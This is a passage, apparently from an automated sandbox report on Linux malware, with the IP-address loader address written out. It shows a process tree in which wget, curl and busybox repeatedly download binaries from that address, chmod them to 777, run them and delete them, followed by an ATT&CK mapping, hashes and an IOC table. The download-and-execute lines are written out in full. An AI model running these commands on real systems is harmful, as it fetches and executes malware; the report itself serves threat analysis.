  /bin/busybox wget http://216.126.231.240/bins/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:954
- /bin/chmod
  chmod 777 SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - File and Directory Permissions Modification
  PID:955
- /tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  ./SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  - Executes dropped EXE
  PID:956
- /bin/rm
  rm SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
  2⤵
  PID:957
- /usr/bin/wget
  wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:958
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:959
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:960
- /bin/chmod
  chmod 777 cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - File and Directory Permissions Modification
  PID:961
- /tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  ./cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  - Executes dropped EXE
  PID:962
- /bin/rm
  rm cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
  2⤵
  PID:963
- /usr/bin/wget
  wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:964
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:966
- /bin/chmod
  chmod 777 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - File and Directory Permissions Modification
  PID:967
- /tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  ./57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  - Executes dropped EXE
  PID:968
- /bin/rm
  rm 57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
  2⤵
  PID:969
- /usr/bin/wget
  wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:970
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:971
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:972
- /bin/chmod
  chmod 777 BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - File and Directory Permissions Modification
  PID:973
- /tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  ./BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  - Executes dropped EXE
  PID:974
- /bin/rm
  rm BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
  2⤵
  PID:975
- /usr/bin/wget
  wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:976
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:977
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:978
- /bin/chmod
  chmod 777 evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - File and Directory Permissions Modification
  PID:979
- /tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  ./evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  - Executes dropped EXE
  PID:980
- /bin/rm
  rm evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
  2⤵
  PID:981
- /usr/bin/wget
  wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:982
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:983
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:984
- /bin/chmod
  chmod 777 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - File and Directory Permissions Modification
  PID:985
- /tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  ./8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  - Executes dropped EXE
  PID:986
- /bin/rm
  rm 8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
  2⤵
  PID:987

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	process
/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	746	BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	752	evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	776	8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju
/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	808	57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	815	K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	824	n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	853	de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	866	YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	872	NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	878	WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	884	bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	890	VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	896	SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	902	cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
/tmp/NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q	908	NFMltpDI2pwEZQIQyoj1QGgoy3LdmXjt4q
/tmp/WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO	914	WbI94NuUlzCWuMaIus8dZUbXVFwq2yyCCO
/tmp/K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3	920	K1nTT72xBzC0GySvwQlvs4yD6tQpiS40X3
/tmp/n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS	926	n2esVAKBZ4mPur2ugnoHfNeQ6GcpI0mteS
/tmp/de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL	932	de1TCtowW4YXLK3aMQCLCu45FaZiSUUewL
/tmp/YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv	938	YPX20iXdE01EubuCO1vKPKpWurO2dtxnfv
/tmp/bm4U9kz9o489NfSCsldH4iikrwNKhC0D83	944	bm4U9kz9o489NfSCsldH4iikrwNKhC0D83
/tmp/VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8	950	VS1zIzlfDLNogCiKjGs9q77NwBQCNDYBL8
/tmp/SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d	956	SakrSjmAz6L9fE357FWDzjiA1Y4IlNJD3d
/tmp/cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72	962	cWUesRaKQwwJxPW3wRZn0jCXOuGEfrKg72
/tmp/57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv	968	57KRUWXFfHu3VWO4b1mlgA8S9fG3MLFYGv
/tmp/BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW	974	BFR0SDwLKL8WGZWw1Y9arCn6tZ0sZ7N1YW
/tmp/evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu	980	evByMY4wmzNymjcp2tK0lMRkVdU65J5ieu
/tmp/8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju	986	8McNbOUeS9YrCMB0d5zxqK6v1brSBayWju